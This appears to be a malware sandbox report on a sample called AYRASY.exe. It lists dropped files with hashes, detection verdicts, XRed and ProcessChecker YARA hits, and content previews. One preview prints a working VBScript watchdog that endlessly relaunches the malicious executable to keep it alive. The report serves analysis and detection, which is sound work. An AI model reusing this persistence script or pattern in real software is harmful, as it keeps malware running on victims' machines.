                                                                                                                            SHA-256:F341048BF343BF195E277A9C87C8078300314967D83DA7E635BF73A979B58291
                                                                                                                            SHA-512:A871F7E5559BFECA26BA461399100F5C8AD49D4F0DAA5D2FA854D667AFE867548F6A488371D0EF06BD972D186F96EEF1A378F0FF2CFFFE3197DF1FE643521DC2
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MQfTzygbE5tF5lMLTx0rxQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.244658155892202
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0sCSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+nC+pAZewRDK4mW
                                                                                                                            MD5:FEF8F4B916EB86A46AB24E30B8A77E1C
                                                                                                                            SHA1:0AEA46F893A9CA37AACB0EE3DC06E76ECA95877C
                                                                                                                            SHA-256:12DB837F12DD6A741928CDF0B3F2B12FF6D8B8952292C85E63E94F7F39593E93
                                                                                                                            SHA-512:E630C7BE1D35FE9238610A5E989D7A7B908A2BCA10A853B4E7E8E026F270ACE4518BC9F9AD574293D6AFCF71B94388C57A7CABF7A61FE15B189C8E9BE2F2C416
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="P-7eaNsno9xsviEn6UhxlA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.268125098283457
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0knSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Nn+pAZewRDK4mW
                                                                                                                            MD5:08673D17E97CCF3FE70BC2766AC491BD
                                                                                                                            SHA1:B6569D82FDB79E70B6FDF56EB61A2522C4029C0D
                                                                                                                            SHA-256:22753011287EB92A98B9577EC8431F1A366C05B2C29CF0D53F4F902B3412BC7D
                                                                                                                            SHA-512:B577888B912638F424E47512AB0379F1D433FEF34A4353677BC8E28B718BEF1ED74D694105D66633224458EEF05776FCB81E087F4E00D40170E9D15FD173AD05
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FGToPRj3Y0oiH9NUxCUekA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                            Process:C:\Users\user\Desktop\._cache_AYRASY.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):840
                                                                                                                            Entropy (8bit):5.3504875395593805
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:dF/UF2IU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UF4t+G+7xLxe0WABNVIqZaVzgA
                                                                                                                            MD5:08BAC9FF4730CA7A95DD923F66D2A6F7
                                                                                                                            SHA1:A1284ADD696500CF838C32A1126C2A1010680575
                                                                                                                            SHA-256:F8F5031C369B99DB281E4C7C74F2A925F227C2622F9E8E42B36E34D851B85119
                                                                                                                            SHA-512:0FDFB396F73A4F4414CF9AD30D345C998409059DB67AE5E7BF3E4DA773FB04CF6FBB5062ACB6A0B0E5EB3DC38D4F83310B557A5A16360C1A11B49B6D02E32F2E
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_AYRASY.exe"..fileset = """C:\Users\user\Desktop\._cache_AYRASY.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.258752841764764
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0ESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z+pAZewRDK4mW
                                                                                                                            MD5:AB7ABD57F2C01C7F4B01BB1834929052
                                                                                                                            SHA1:C7AF9161953420741EC14235D5275B05BD26BBD6
                                                                                                                            SHA-256:EEEAC6BE4412CA721344AC70EA1EF1B9F72D8B4A640EC357FAFEC0AF4CDE0E42
                                                                                                                            SHA-512:841BBFAE02313366018437B1CF7970065BA298573399BE690245DB2E339E6D215ADA18036160DEBB9E75CA61DE495374D4F59BFA9FFCE9F58D85B6E42EBA32B0
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gII6-sEK2LFn3b-3z23ebQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.253175507634135
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0QSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+T+pAZewRDK4mW
                                                                                                                            MD5:928238AAA34C57ABE96E33E9F427B553
                                                                                                                            SHA1:FE1565C845294F82F9D1623E89FFDEB3E84F5A03
                                                                                                                            SHA-256:BA5F0D0F18CA5305243CCF743A45874E93F958EAB3804260957F5131402F8336
                                                                                                                            SHA-512:937910A63B20DE3674613C718A9B8F9707E06613510E4BA369CE98B8EA1F90D375A3F477068B0C933D68A6FFF62FD05C8BC9840117FCC732005479CCB3BD12E5
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cBe2HWypmVq75q_707cyhw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:Microsoft Excel 2007+
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):18387
                                                                                                                            Entropy (8bit):7.523057953697544
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                            MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                            SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                            SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                            SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.2714140611415585
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
                                                                                                                            MD5:FB2114FB9513E0E944BABBDF56943D26
                                                                                                                            SHA1:52F96C9C99A54386F3AD2CBFCC9297BC286C68A3
                                                                                                                            SHA-256:44DC0984DB29C3B006C6200A4553D53270250206ACD62B7B36006CE2386B6291
                                                                                                                            SHA-512:E935595B1689BBD5C645458A12F644F871DC8BEE31993F1B46D0766A3CBC6C2F391C9BE2DDFCDA52BD9D6782626294E087628A12E30B9A670B33BF6223D878D7
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VKa6mAGIf36bHXGr68c8Vw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.2561264973583
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0hSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+y+pAZewRDK4mW
                                                                                                                            MD5:A22FFC555F884935F4B4A5F23B6D364B
                                                                                                                            SHA1:55549895413ECAACD98A9BAD5B86314C1CDC3C2C
                                                                                                                            SHA-256:8F842C834D697DE860427B64760CC43E1D94D06FEE700E133A2BDC0E77D9EA63
                                                                                                                            SHA-512:E82767D25F2F8903F9A9DBDDA5D45F859575A50D61085A9A92D8208417B28D9BAF197DC5A40E0363B00CB73D50A3C5C108954FD23C642C637817FC69937E5539
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LRUZ0p0iT_9DdmBp7qnr4Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):165
                                                                                                                            Entropy (8bit):1.610853976637159
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:iXFQLjLlAWFd:97
                                                                                                                            MD5:CA2C2DB316A89F044206082EEB3A366E
                                                                                                                            SHA1:B1B7DFF94B991B26093AA29BF3793DDE245412E1
                                                                                                                            SHA-256:12393F1035745AD02C149920E37AFFE459CD0448A2AFEE25C1FABA8060758FF7
                                                                                                                            SHA-512:66BC8C779431737A3FA00AF7697C299BC473B6FD22D48914986821DA7C0AB90554D32F7F2B471EAB5410F9C0DE7E076F4D6DEDDCCE1948818F7781DAE9EDEBE7
                                                                                                                            Malicious:false
                                                                                                                            Preview:.user ..e.n.g.i.n.e.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):32768
                                                                                                                            Entropy (8bit):3.746897789531007
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                            MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                            SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                            SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                            SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                            Malicious:false
                                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\Desktop\._cache_AYRASY.exe
                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:24:06 2024, mtime=Mon Dec 30 09:24:07 2024, atime=Mon Dec 30 09:24:07 2024, length=978432, window=hide
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1814
                                                                                                                            Entropy (8bit):3.4005422202098496
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:8UwADdilXUJeabVZjQAJeTEGE2+s9T4IlILZm:8nADdilmv3jnJkjr9MIl2
                                                                                                                            MD5:DA8963990861F942B67E5EF4A6AAF753
                                                                                                                            SHA1:CA92F3FACC7403E687EF35543A9B1AB55B6C7791
                                                                                                                            SHA-256:FDADEB31300C334235210A0FAB0762C87CE92EB430B9CEE114F933D209C747B4
                                                                                                                            SHA-512:C90B8D5819B9DBCB229A864F07C64FC98D38F8EE23CE146BF23198DC19FEABF0CB8BD05CE927D85C74D39FDC6F98CA2DBA70A2A43D42E43AEDDD33AAA33B6A2C
                                                                                                                            Malicious:false
                                                                                                                            Preview:L..................F.@.. ...n/...Z......Z......Z............................:..DG..Yr?.D..U..k0.&...&.......$..S.....~.Z..=8...Z......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.S...........................^.A.p.p.D.a.t.a...B.V.1......Y.R..Roaming.@......EW<2.Y.R..../......................9*.R.o.a.m.i.n.g.....V.1......Y.S..Windata.@......Y.S.Y.S..........................*...W.i.n.d.a.t.a.....`.2......Y.S .YOABSG.exe..F......Y.S.Y.S.......................... '..Y.O.A.B.S.G...e.x.e.......c...............-.......b...........p.Y=.....C:\Users\user\AppData\Roaming\Windata\YOABSG.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.Y.O.A.B.S.G...e.x.e.,.".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll......................................................................................................
                                                                                                                            Process:C:\Users\user\Desktop\._cache_AYRASY.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):978432
                                                                                                                            Entropy (8bit):7.878129877710586
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:ChloDX0XOf4btEYBiYZh/gRrrAFmqrMHisAMED:ChloJfEEaiSgCkqoHis
                                                                                                                            MD5:8E44132C27ADC94100C8D8BE5D4AD041
                                                                                                                            SHA1:8F6D3501AEE4CA56051FBCD4D4258DCAB9BF8AA1
                                                                                                                            SHA-256:7E9FF2F8DB8A740FB31A969B90AA86A4D11BBD919233AC2A9D676FC82B426B94
                                                                                                                            SHA-512:A06DD554B16630570C4F25D2C540E297233A201C9233977A5B06664B7659AA8CBAEAD38FAB88841C8ADCAA5F09F7E23297E92B7D9529CA0D3B2DA5E860C4584B
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...p!mg.........."......P........... .......0....@........................... ...........@...@.......@.....................T. .$....0..T...................x. ......................................"..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........0.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                                                                                                            Process:C:\Users\user\Desktop\AYRASY.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):978432
                                                                                                                            Entropy (8bit):7.878129877710586
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:ChloDX0XOf4btEYBiYZh/gRrrAFmqrMHisAMED:ChloJfEEaiSgCkqoHis
                                                                                                                            MD5:8E44132C27ADC94100C8D8BE5D4AD041
                                                                                                                            SHA1:8F6D3501AEE4CA56051FBCD4D4258DCAB9BF8AA1
                                                                                                                            SHA-256:7E9FF2F8DB8A740FB31A969B90AA86A4D11BBD919233AC2A9D676FC82B426B94
                                                                                                                            SHA-512:A06DD554B16630570C4F25D2C540E297233A201C9233977A5B06664B7659AA8CBAEAD38FAB88841C8ADCAA5F09F7E23297E92B7D9529CA0D3B2DA5E860C4584B
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...p!mg.........."......P........... .......0....@........................... ...........@...@.......@.....................T. .$....0..T...................x. ......................................"..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........0.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:Microsoft Excel 2007+
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):18387
                                                                                                                            Entropy (8bit):7.523057953697544
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                            MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                            SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                            SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                            SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):165
                                                                                                                            Entropy (8bit):1.610853976637159
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:iXFQLjLlAWFd:97
                                                                                                                            MD5:CA2C2DB316A89F044206082EEB3A366E
                                                                                                                            SHA1:B1B7DFF94B991B26093AA29BF3793DDE245412E1
                                                                                                                            SHA-256:12393F1035745AD02C149920E37AFFE459CD0448A2AFEE25C1FABA8060758FF7
                                                                                                                            SHA-512:66BC8C779431737A3FA00AF7697C299BC473B6FD22D48914986821DA7C0AB90554D32F7F2B471EAB5410F9C0DE7E076F4D6DEDDCCE1948818F7781DAE9EDEBE7
                                                                                                                            Malicious:false
                                                                                                                            Preview:.user ..e.n.g.i.n.e.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):771584
                                                                                                                            Entropy (8bit):6.639994041359131
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Igr:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                                                            MD5:27C056CC4DAFB6B3161272E800C85E55
                                                                                                                            SHA1:3CF48608E3C73115E37316A49F47D3586C5C94E1
                                                                                                                            SHA-256:8445CFA3304BBC48A8616AABA0881A2433E52B839DD5E6234DF8776AE7873C26
                                                                                                                            SHA-512:0D0A77C959BA38555E49C1ECDB5530A8D0D2C0D4BCF4B7BF91A82854D82ED139F0737C9024979F148B67AA2287B087F585B0F9B69F931733B4BDE32D491FECB7
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1835008
                                                                                                                            Entropy (8bit):4.46869223690105
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:RzZfpi6ceLPx9skLmb0fyZWSP3aJG8nAgeiJRMMhA2zX4WABluuNZjDH5S:JZHtyZWOKnMM6bFpLj4
                                                                                                                            MD5:277437B46D696BA79E86946A70540328
                                                                                                                            SHA1:9BED295C9068323FC091518C89F5FEDD6B66958B
                                                                                                                            SHA-256:38070B616DB7B52D4925242EE4AC818DF45EA8CDFFD55B2948950E806A8754F6
                                                                                                                            SHA-512:E67F97DC1F5456F50A3C83BFBF295B9801BF2FEFD2B55E2249B0910DE6A3BFDDDD931B57867CB84961296BFDD10AD893740057D7CE5E04C64E40DE546EE407B0
                                                                                                                            Malicious:false
